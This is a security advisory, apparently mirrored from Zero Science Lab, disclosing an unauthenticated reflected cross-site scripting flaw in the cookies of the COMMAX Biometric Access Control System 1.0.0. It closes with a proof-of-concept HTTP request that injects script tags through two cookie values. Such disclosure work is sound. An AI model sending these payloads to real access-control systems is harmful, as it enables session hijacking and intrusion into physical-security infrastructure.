Share
## https://sploitus.com/exploit?id=PACKETSTORM:163834
COMMAX Biometric Access Control System 1.0.0 Cookie Reflected XSS  
  
  
Vendor: COMMAX Co., Ltd.  
Prodcut web page: https://www.commax.com  
Affected version: 1.0.0  
  
Summary: Biometric access control system.  
  
Desc: The application is vulnerable to an unauthenticated reflected  
cross-site scripting (XSS) vulnerability. Input passed to the Cookies  
'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM' is not properly sanitised before  
being returned to the user. This can be exploited to execute arbitrary  
HTML and JS code in a user's browser session in context of an affected  
site.  
  
Tested on: nginx/1.14.0 (Ubuntu)  
MariaDB/10.3.15  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5660  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5660.php  
  
  
02.08.2021  
  
--  
  
  
GET /db_dump.php HTTP/1.1  
Host: 192.168.1.1  
Upgrade-Insecure-Requests: 1  
User-Agent: UA/1.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=lab"><script>confirm(document.domain)</script>; CMX_ADMIN_LV=8; CMX_COMPLEX_NM=ZSL"><script>confirm(window.origin)</script>; CMX_COMPLEX_IP=2.5.1.0  
Connection: close